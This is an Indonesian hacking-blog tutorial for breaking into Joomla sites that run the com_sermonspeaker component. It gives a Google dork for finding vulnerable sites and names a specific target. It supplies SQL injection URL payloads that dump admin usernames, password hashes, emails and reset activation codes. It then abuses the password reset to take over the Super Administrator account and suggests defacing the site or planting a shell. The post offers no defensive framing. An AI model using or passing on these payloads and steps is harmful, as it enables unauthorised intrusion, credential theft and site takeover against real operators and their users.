^_^ hellcome ^_^

Step by step Exploit Joomla | |~dream cyber comunity~|
murah
Home » » Step by step Exploit Joomla

Step by step Exploit Joomla

Written By Unknown on 21 Maret 2012 | 23.22

=================================================
Oke langsung ke pembahasan aja yah
==================================
* Dork : inurl: option=com_sermonspeaker
==================================
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

==================================

1. Pertama cari dulu target di google.
Dork : inurl: option=com_sermonspeaker

2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah 
http://loichung.com
j1.jpg 



3. Langsung pasang exploit nya
=========================================
/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

=========================================
j2.jpg 




4. Wah username, email, sama passwordnya keluar semua tuh. Buat yang mau encrypt password nya silahkan. Tapi kali ini kita akan menggunakan tekhnik lupa password.

===================================================
/index.php?option=com_user&view=reset
===================================================
Tinggal masukin email admin nya
j3.jpg 

5. Terus tekan submit dan akan muncul seperti ini
j4.jpg 

Wah minta activation code, harus gimana nih ?

Tenang aja monggo kita cari(aktivasinya
Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini

============================================================
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/
============================================================
Jika kita sudah menambahkan ,0x3a,activation setelah 0x3a,email maka akan muncul seperti ini
j5.jpg 


Wah activation code nya keluar tuh sekarang tinggal kita paste aja activation code nya
j6.jpg 

6. Sekarang tekan lagi submit maka akan muncul seperti ini
Nah sekarang silahkan masukkan password baru sesuai keinginan kita. Setelah itu tekan submit
lagi. j7.jpg 


7. Sekarang kita login as admin melalui
==================================
http://[site]/[pacth]/administrator
==================================
j9.jpg 

Masukkan username admin dan password admin.
j10.jpg 

Dan sekarang kita sudah berhasil login sebagai Super Administrator dan kita berhak melakukan apapun di site tersebut. Untuk selanjutnya silahkan anda lanjutkan.

Entah site itu mau anda
* Deface Indexnya
* Tanam shell
* Dll



Hanya itu tutor yang dapat saya berikan. Lebih dan kurang terima kasih. saya juga masih belajar ^_^ biar ga jauh saya nyari tutor di google :D
Description: Step by step Exploit Joomla Rating: 5 Reviewer: Unknown - ItemReviewed: Step by step Exploit Joomla
Share this article :

0 komentar sobat dream cyber comunity :

Posting Komentar

komentar yang tidak sopan akan di hapus...terima kasih :-*

Follow Me

ARSIP BLOG

Pasang Iklan Murah
 
Support : My Blog | My Web | Contact Me
Copyright © 2013. |~dream cyber comunity~| - All Rights Reserved
Template Created by Creating Website Published by blogger
Proudly powered by Blogger